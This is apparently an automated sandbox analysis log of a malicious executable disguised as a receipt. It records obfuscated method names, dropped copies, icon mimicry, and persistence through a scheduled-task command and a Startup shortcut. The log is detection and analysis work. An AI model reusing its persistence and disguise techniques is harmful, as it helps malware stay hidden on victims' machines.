            Source: C:\Users\user\Desktop\Recaipt202431029.exeCode function: 0_2_068651E0 push es; ret 0_2_068651F0
            Source: C:\Users\user\Desktop\Recaipt202431029.exeCode function: 0_2_06C73698 push eax; ret 0_2_06C73A31
            Source: C:\Users\user\Desktop\Recaipt202431029.exeCode function: 0_2_06C78DF9 push eax; mov dword ptr [esp], edx0_2_06C78E0C
            Source: C:\Users\user\Desktop\Recaipt202431029.exeCode function: 0_2_06C7E1AD push edx; ret 0_2_06C7E1B1
            Source: C:\Users\user\Desktop\Recaipt202431029.exeCode function: 0_2_06C74960 push eax; iretd 0_2_06C74961
            Source: C:\Users\user\Desktop\Recaipt202431029.exeCode function: 0_2_06D17746 pushfd ; ret 0_2_06D17747
            Source: C:\Users\user\Desktop\Recaipt202431029.exeCode function: 0_2_06D104A0 pushfd ; ret 0_2_06D104A1
            Source: C:\Users\user\Desktop\Recaipt202431029.exeCode function: 0_2_06D12EA4 push ds; iretd 0_2_06D12EA5
            Source: C:\Users\user\Desktop\Recaipt202431029.exeCode function: 0_2_06D12E6D push ds; iretd 0_2_06D12E6E
            Source: C:\Users\user\Desktop\Recaipt202431029.exeCode function: 0_2_06D17A8B pushfd ; ret 0_2_06D17A8C
            Source: C:\Users\user\Desktop\Recaipt202431029.exeCode function: 0_2_06D17A6B pushfd ; ret 0_2_06D17A6C
            Source: C:\Users\user\Desktop\Recaipt202431029.exeCode function: 0_2_06D1394B push ds; iretd 0_2_06D1394D
            Source: C:\Users\user\Desktop\Recaipt202431029.exeCode function: 0_2_085070D9 push 0000005Dh; ret 0_2_08507107
            Source: C:\Users\user\Desktop\Recaipt202431029.exeCode function: 0_2_0850A5D8 push eax; ret 0_2_0850A601
            Source: C:\Users\user\Desktop\Recaipt202431029.exeCode function: 0_2_085006D7 push 0000005Dh; ret 0_2_085006FD
            Source: C:\Users\user\Desktop\Recaipt202431029.exeCode function: 9_2_0563A800 push es; ret 9_2_0563A810
            Source: C:\Users\user\AppData\Roaming\JvkAPBBIe.exeCode function: 10_2_06EB3698 push eax; ret 10_2_06EB3A31
            Source: C:\Users\user\AppData\Roaming\JvkAPBBIe.exeCode function: 10_2_06EB8E09 push eax; mov dword ptr [esp], edx10_2_06EB8E0C
            Source: C:\Users\user\AppData\Roaming\JvkAPBBIe.exeCode function: 10_2_06EB4960 push eax; iretd 10_2_06EB4961
            Source: C:\Users\user\AppData\Roaming\JvkAPBBIe.exeCode function: 10_2_07057746 pushfd ; ret 10_2_07057747
            Source: C:\Users\user\AppData\Roaming\JvkAPBBIe.exeCode function: 10_2_070504A0 pushfd ; ret 10_2_070504A1
            Source: C:\Users\user\AppData\Roaming\JvkAPBBIe.exeCode function: 10_2_07057A6B pushfd ; ret 10_2_07057A6C
            Source: C:\Users\user\AppData\Roaming\JvkAPBBIe.exeCode function: 10_2_07057A8B pushfd ; ret 10_2_07057A8C
            Source: Recaipt202431029.exeStatic PE information: section name: .text entropy: 7.62917059033493
            Source: JvkAPBBIe.exe.0.drStatic PE information: section name: .text entropy: 7.62917059033493
            Source: Notepab .exe.9.drStatic PE information: section name: .text entropy: 7.62917059033493
            Source: 0.2.Recaipt202431029.exe.376c418.2.raw.unpack, sh7KC6wSWH5lupliVZ.csHigh entropy of concatenated method names: 'z67SfmJXSx', 'ufeSLnOX5j', 'DVHSnYnut6', 'DqeSFtDBHv', 'tQqSWj8e6J', 'jhuSodZoLX', 'btaPWmIotAWIVmmlEr', 'FWsc9ORZIMRwoKdcTt', 'ppUSSLpsuk', 'OYHSa6Tp1a'
            Source: 0.2.Recaipt202431029.exe.376c418.2.raw.unpack, wlS2y7giOFEEs2owSI.csHigh entropy of concatenated method names: 'IqCeyfFCs2', 'iH7e000Jbh', 'itTeZXj7q2', 'YY0ef9tuvu', 'nPYeGdj6gS', 'XiQeLWPyUm', 'Next', 'Next', 'Next', 'NextBytes'
            Source: 0.2.Recaipt202431029.exe.376c418.2.raw.unpack, V8FJEZip6OQ2GOLBYD.csHigh entropy of concatenated method names: 'KXJGXilugw', 'O06GRhlYTG', 'kotGCx6dvS', 'bVjGhCNZvG', 'RpvGdsKGKp', 'XgrGIHNJsq', 'JgaG1yHl3e', 'omKGqhvgit', 'DBOG8JHlCj', 'fr5GlWaLtD'
            Source: 0.2.Recaipt202431029.exe.376c418.2.raw.unpack, ubnIk5PQJIHdNPtA1C.csHigh entropy of concatenated method names: 'EGFWlVYV55', 'rwEWVtYX27', 'sUqWPEVAOh', 'kiwWt8kwXQ', 'bmHWR7aLoD', 'viVWCeIxIC', 'FMaWhu6wln', 'RMMWd9gaD7', 'axsWI8q9EV', 'JqpW1iO8CB'
            Source: 0.2.Recaipt202431029.exe.376c418.2.raw.unpack, JDLHBOzmg9HpYy5oc4.csHigh entropy of concatenated method names: 'm2Ler9bPfK', 'NGgemxGFSB', 'MTSeEvKZoe', 'FGTeX7aiwT', 'ItKeRbZipD', 'Porehwc9rb', 'y5LedbsBJw', 'B8beMBa6qG', 'hjXeQc5434', 'Vigejv8JGM'
            Source: 0.2.Recaipt202431029.exe.376c418.2.raw.unpack, v0QynmYEK8NGGZ1gt8.csHigh entropy of concatenated method names: 'I0PkmIg5fT', 'fmbkE5EtTY', 'UmWkXj7jul', 'h79kRXnj9Y', 'YVokhFeV0i', 'MQEkdKqbHq', 'zfwk1eSBXX', 'LcXkqCoPU4', 'Tplkl0Slit', 'sn5kv17dS2'
            Source: 0.2.Recaipt202431029.exe.376c418.2.raw.unpack, USoDbmEVHYnut6mqet.csHigh entropy of concatenated method names: 'x3Nyssiqu0', 'q22yrEV9CK', 'BO1ym8qS9K', 'mTkyEPhCQm', 'GgAyWQXXip', 'ICsyou8Fl8', 'J3fyAI5Pub', 'W8LyBrcbWZ', 'Q31yGWJIZ4', 'SZUyeyspwu'
            Source: 0.2.Recaipt202431029.exe.376c418.2.raw.unpack, AB63Sw8S5ve08y5BmM.csHigh entropy of concatenated method names: 'wq2fQU7LN0', 'wbtfjM0qoJ', 'cnufDPDIVo', 'OUqfskU2yV', 'tMLfNyqk0b', 'AvHfru6kcx', 'ElJfOLp49j', 'RFUfm52LIi', 'c7UfEehfc4', 'BwWf6UaEut'
            Source: 0.2.Recaipt202431029.exe.376c418.2.raw.unpack, aQcGssyEghRnbtv7BY.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'ofuHiQJb3K', 'fwQHgEed2I', 'GUMHzWtVqr', 'e4OaTeHSO6', 'LhmaS8L57g', 'xSOaHZ0gFe', 'WoqaaBNysq', 'PW78skrgqfsnC6Urx6U'
            Source: 0.2.Recaipt202431029.exe.376c418.2.raw.unpack, E8dYjnUb8wp63GcZvn.csHigh entropy of concatenated method names: 'Dispose', 'zFgSivJ2wQ', 'Jj7HR4tQ15', 'Yl4AHKwNKw', 'NZQSgsCest', 'JTUSzd6BJN', 'ProcessDialogKey', 'mAJHT8FJEZ', 'U6OHSQ2GOL', 'qYDHHulS2y'
            Source: 0.2.Recaipt202431029.exe.376c418.2.raw.unpack, WG61eoLfq8l6bLFQSu.csHigh entropy of concatenated method names: 'wkNaxWs0LF', 'lypa3ibyT9', 'EkhaUqA0MP', 'QYmaylGbWs', 'f4Ga0nZ5ex', 'aKJaZPmWik', 'XBcafkCGg5', 'CqdaLQZ3Vb', 'MjEa4h0XrO', 'I1hantLiSl'
            Source: 0.2.Recaipt202431029.exe.376c418.2.raw.unpack, khktj394Jq4k0Qihck.csHigh entropy of concatenated method names: 'QLtAnNeXjS', 'JVdAFKiOP6', 'ToString', 'YKYA32pPlZ', 'JXhAUGoXjo', 'RRhAywvRZM', 'mQpA0vsvFr', 'zxuAZRgMVV', 'HOmAftrePN', 'gMUALxjgUX'
            Source: 0.2.Recaipt202431029.exe.376c418.2.raw.unpack, zBHva96SRgInJKQqj8.csHigh entropy of concatenated method names: 's5J0NCkqhJ', 'K4G0On4kwW', 'uMqyCYkJux', 'tLYyhxtpmN', 'oRMydTkpEj', 'ibDyIZYatU', 'WHry1QX5dD', 'giQyqJd44Z', 'rEay87JYP5', 'fgGyllFu9v'
            Source: 0.2.Recaipt202431029.exe.376c418.2.raw.unpack, WmJXSxm2fenOX5jabt.csHigh entropy of concatenated method names: 'F1dUPKscHs', 'xi7UtUmJPW', 'urcUbPfVhb', 'lZgU9agSZn', 'yANUpxhlH9', 'U9oUJ4wLUr', 'bCxU5JRNXB', 'JbLU7YuFWB', 'u7JUiwflxH', 'jXeUgxRGoT'
            Source: 0.2.Recaipt202431029.exe.376c418.2.raw.unpack, CqStfMSwAuy8wsILkBw.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'hRT2GDkirt', 'xos2eReCWZ', 'zd32KrXZ3q', 'kZb222i18u', 'vHp2cnDwie', 'ahQ2ucDtDJ', 'K3J2MFQfeL'
            Source: 0.2.Recaipt202431029.exe.376c418.2.raw.unpack, s6JfhuXdZoLXbWm70r.csHigh entropy of concatenated method names: 'SIyZxG1ypv', 'svfZUNekVL', 'BLVZ0j7jHQ', 'WrgZfKNDUc', 'cWEZLoy7h5', 'Tuj0pYYxKu', 'bAW0JKMnWw', 'lOb05rjqhK', 'ldp07cShRX', 'aMf0iGnEnh'
            Source: 0.2.Recaipt202431029.exe.376c418.2.raw.unpack, CFlDOXHJlcGxx7H9P7.csHigh entropy of concatenated method names: 'SqxDjywEq', 'jUfsdokxj', 'ATCrwam09', 'A7AOR3bev', 'm4KErBiLO', 'loR6pDUEK', 'jhbf7TQnx014IIgI5w', 'QNwMfvZSWoUmkk2XEn', 'CYU18QKGLkuV5qbsqh', 'HMyBGMHx3'
            Source: 0.2.Recaipt202431029.exe.376c418.2.raw.unpack, yeJy9DSSkBnI5UsF9ey.csHigh entropy of concatenated method names: 'LldegolArn', 'NP8ezW3aZ4', 'NJBKTG3A5R', 'pJYKSaErXF', 'zK6KH1i3lR', 'cb5Ka9MUZ7', 'u6UKwn5Pui', 'zp4KxFu2ur', 'XSiK3LGBkc', 'mokKUqDMlj'
            Source: 0.2.Recaipt202431029.exe.376c418.2.raw.unpack, TLKBrM5TcDFgvJ2wQl.csHigh entropy of concatenated method names: 'FwsGWBnyrS', 'VwbGAEPOWe', 'I8cGGnCwHa', 'Wo0GKi9oAq', 'PTQGc0HcWb', 'loWGMY10HO', 'Dispose', 'z6UB3YD1od', 'EqsBUUj1VY', 'afUByUGW2e'
            Source: 0.2.Recaipt202431029.exe.88a0000.5.raw.unpack, sh7KC6wSWH5lupliVZ.csHigh entropy of concatenated method names: 'z67SfmJXSx', 'ufeSLnOX5j', 'DVHSnYnut6', 'DqeSFtDBHv', 'tQqSWj8e6J', 'jhuSodZoLX', 'btaPWmIotAWIVmmlEr', 'FWsc9ORZIMRwoKdcTt', 'ppUSSLpsuk', 'OYHSa6Tp1a'
            Source: 0.2.Recaipt202431029.exe.88a0000.5.raw.unpack, wlS2y7giOFEEs2owSI.csHigh entropy of concatenated method names: 'IqCeyfFCs2', 'iH7e000Jbh', 'itTeZXj7q2', 'YY0ef9tuvu', 'nPYeGdj6gS', 'XiQeLWPyUm', 'Next', 'Next', 'Next', 'NextBytes'
            Source: 0.2.Recaipt202431029.exe.88a0000.5.raw.unpack, V8FJEZip6OQ2GOLBYD.csHigh entropy of concatenated method names: 'KXJGXilugw', 'O06GRhlYTG', 'kotGCx6dvS', 'bVjGhCNZvG', 'RpvGdsKGKp', 'XgrGIHNJsq', 'JgaG1yHl3e', 'omKGqhvgit', 'DBOG8JHlCj', 'fr5GlWaLtD'
            Source: 0.2.Recaipt202431029.exe.88a0000.5.raw.unpack, ubnIk5PQJIHdNPtA1C.csHigh entropy of concatenated method names: 'EGFWlVYV55', 'rwEWVtYX27', 'sUqWPEVAOh', 'kiwWt8kwXQ', 'bmHWR7aLoD', 'viVWCeIxIC', 'FMaWhu6wln', 'RMMWd9gaD7', 'axsWI8q9EV', 'JqpW1iO8CB'
            Source: 0.2.Recaipt202431029.exe.88a0000.5.raw.unpack, JDLHBOzmg9HpYy5oc4.csHigh entropy of concatenated method names: 'm2Ler9bPfK', 'NGgemxGFSB', 'MTSeEvKZoe', 'FGTeX7aiwT', 'ItKeRbZipD', 'Porehwc9rb', 'y5LedbsBJw', 'B8beMBa6qG', 'hjXeQc5434', 'Vigejv8JGM'
            Source: 0.2.Recaipt202431029.exe.88a0000.5.raw.unpack, v0QynmYEK8NGGZ1gt8.csHigh entropy of concatenated method names: 'I0PkmIg5fT', 'fmbkE5EtTY', 'UmWkXj7jul', 'h79kRXnj9Y', 'YVokhFeV0i', 'MQEkdKqbHq', 'zfwk1eSBXX', 'LcXkqCoPU4', 'Tplkl0Slit', 'sn5kv17dS2'
            Source: 0.2.Recaipt202431029.exe.88a0000.5.raw.unpack, USoDbmEVHYnut6mqet.csHigh entropy of concatenated method names: 'x3Nyssiqu0', 'q22yrEV9CK', 'BO1ym8qS9K', 'mTkyEPhCQm', 'GgAyWQXXip', 'ICsyou8Fl8', 'J3fyAI5Pub', 'W8LyBrcbWZ', 'Q31yGWJIZ4', 'SZUyeyspwu'
            Source: 0.2.Recaipt202431029.exe.88a0000.5.raw.unpack, AB63Sw8S5ve08y5BmM.csHigh entropy of concatenated method names: 'wq2fQU7LN0', 'wbtfjM0qoJ', 'cnufDPDIVo', 'OUqfskU2yV', 'tMLfNyqk0b', 'AvHfru6kcx', 'ElJfOLp49j', 'RFUfm52LIi', 'c7UfEehfc4', 'BwWf6UaEut'
            Source: 0.2.Recaipt202431029.exe.88a0000.5.raw.unpack, aQcGssyEghRnbtv7BY.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'ofuHiQJb3K', 'fwQHgEed2I', 'GUMHzWtVqr', 'e4OaTeHSO6', 'LhmaS8L57g', 'xSOaHZ0gFe', 'WoqaaBNysq', 'PW78skrgqfsnC6Urx6U'
            Source: 0.2.Recaipt202431029.exe.88a0000.5.raw.unpack, E8dYjnUb8wp63GcZvn.csHigh entropy of concatenated method names: 'Dispose', 'zFgSivJ2wQ', 'Jj7HR4tQ15', 'Yl4AHKwNKw', 'NZQSgsCest', 'JTUSzd6BJN', 'ProcessDialogKey', 'mAJHT8FJEZ', 'U6OHSQ2GOL', 'qYDHHulS2y'
            Source: 0.2.Recaipt202431029.exe.88a0000.5.raw.unpack, WG61eoLfq8l6bLFQSu.csHigh entropy of concatenated method names: 'wkNaxWs0LF', 'lypa3ibyT9', 'EkhaUqA0MP', 'QYmaylGbWs', 'f4Ga0nZ5ex', 'aKJaZPmWik', 'XBcafkCGg5', 'CqdaLQZ3Vb', 'MjEa4h0XrO', 'I1hantLiSl'
            Source: 0.2.Recaipt202431029.exe.88a0000.5.raw.unpack, khktj394Jq4k0Qihck.csHigh entropy of concatenated method names: 'QLtAnNeXjS', 'JVdAFKiOP6', 'ToString', 'YKYA32pPlZ', 'JXhAUGoXjo', 'RRhAywvRZM', 'mQpA0vsvFr', 'zxuAZRgMVV', 'HOmAftrePN', 'gMUALxjgUX'
            Source: 0.2.Recaipt202431029.exe.88a0000.5.raw.unpack, zBHva96SRgInJKQqj8.csHigh entropy of concatenated method names: 's5J0NCkqhJ', 'K4G0On4kwW', 'uMqyCYkJux', 'tLYyhxtpmN', 'oRMydTkpEj', 'ibDyIZYatU', 'WHry1QX5dD', 'giQyqJd44Z', 'rEay87JYP5', 'fgGyllFu9v'
            Source: 0.2.Recaipt202431029.exe.88a0000.5.raw.unpack, WmJXSxm2fenOX5jabt.csHigh entropy of concatenated method names: 'F1dUPKscHs', 'xi7UtUmJPW', 'urcUbPfVhb', 'lZgU9agSZn', 'yANUpxhlH9', 'U9oUJ4wLUr', 'bCxU5JRNXB', 'JbLU7YuFWB', 'u7JUiwflxH', 'jXeUgxRGoT'
            Source: 0.2.Recaipt202431029.exe.88a0000.5.raw.unpack, CqStfMSwAuy8wsILkBw.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'hRT2GDkirt', 'xos2eReCWZ', 'zd32KrXZ3q', 'kZb222i18u', 'vHp2cnDwie', 'ahQ2ucDtDJ', 'K3J2MFQfeL'
            Source: 0.2.Recaipt202431029.exe.88a0000.5.raw.unpack, s6JfhuXdZoLXbWm70r.csHigh entropy of concatenated method names: 'SIyZxG1ypv', 'svfZUNekVL', 'BLVZ0j7jHQ', 'WrgZfKNDUc', 'cWEZLoy7h5', 'Tuj0pYYxKu', 'bAW0JKMnWw', 'lOb05rjqhK', 'ldp07cShRX', 'aMf0iGnEnh'
            Source: 0.2.Recaipt202431029.exe.88a0000.5.raw.unpack, CFlDOXHJlcGxx7H9P7.csHigh entropy of concatenated method names: 'SqxDjywEq', 'jUfsdokxj', 'ATCrwam09', 'A7AOR3bev', 'm4KErBiLO', 'loR6pDUEK', 'jhbf7TQnx014IIgI5w', 'QNwMfvZSWoUmkk2XEn', 'CYU18QKGLkuV5qbsqh', 'HMyBGMHx3'
            Source: 0.2.Recaipt202431029.exe.88a0000.5.raw.unpack, yeJy9DSSkBnI5UsF9ey.csHigh entropy of concatenated method names: 'LldegolArn', 'NP8ezW3aZ4', 'NJBKTG3A5R', 'pJYKSaErXF', 'zK6KH1i3lR', 'cb5Ka9MUZ7', 'u6UKwn5Pui', 'zp4KxFu2ur', 'XSiK3LGBkc', 'mokKUqDMlj'
            Source: 0.2.Recaipt202431029.exe.88a0000.5.raw.unpack, TLKBrM5TcDFgvJ2wQl.csHigh entropy of concatenated method names: 'FwsGWBnyrS', 'VwbGAEPOWe', 'I8cGGnCwHa', 'Wo0GKi9oAq', 'PTQGc0HcWb', 'loWGMY10HO', 'Dispose', 'z6UB3YD1od', 'EqsBUUj1VY', 'afUByUGW2e'
            Source: C:\Users\user\Desktop\Recaipt202431029.exeFile created: C:\Users\user\AppData\Roaming\JvkAPBBIe.exeJump to dropped file
            Source: C:\Users\user\Desktop\Recaipt202431029.exeFile created: C:\Users\user\AppData\Roaming\Notepab .exeJump to dropped file

            Boot Survival

            barindex
            Uses schtasks.exe or at.exe to add and modify task schedules
            Source: C:\Users\user\Desktop\Recaipt202431029.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\JvkAPBBIe" /XML "C:\Users\user\AppData\Local\Temp\tmp912F.tmp"
            Source: C:\Users\user\Desktop\Recaipt202431029.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Notepab .lnkJump to behavior
            Source: C:\Users\user\Desktop\Recaipt202431029.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Notepab .lnkJump to behavior

            Hooking and other Techniques for Hiding and Protection

            barindex
            Icon mismatch, binary includes an icon from a different legit application in order to fool users
            Source: initial sampleIcon embedded in binary file: icon matches a legit application icon: icon (2112).png
            Loading BitLocker PowerShell Module
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Users\user\Desktop\Recaipt202431029.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Recaipt202431029.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Recaipt202431029.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Recaipt202431029.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Recaipt202431029.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Recaipt202431029.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Recaipt202431029.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Recaipt202431029.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Recaipt202431029.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Recaipt202431029.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Recaipt202431029.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Recaipt202431029.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Recaipt202431029.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Recaipt202431029.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Recaipt202431029.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Recaipt202431029.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Recaipt202431029.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Recaipt202431029.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Recaipt202431029.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Recaipt202431029.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Recaipt202431029.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Recaipt202431029.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Recaipt202431029.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Recaipt202431029.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Recaipt202431029.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Recaipt202431029.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Recaipt202431029.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Recaipt202431029.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Recaipt202431029.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Recaipt202431029.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Recaipt202431029.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Recaipt202431029.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Recaipt202431029.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Recaipt202431029.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Recaipt202431029.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Recaipt202431029.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Recaipt202431029.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Recaipt202431029.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Recaipt202431029.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Recaipt202431029.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Recaipt202431029.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Recaipt202431029.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Recaipt202431029.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Recaipt202431029.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
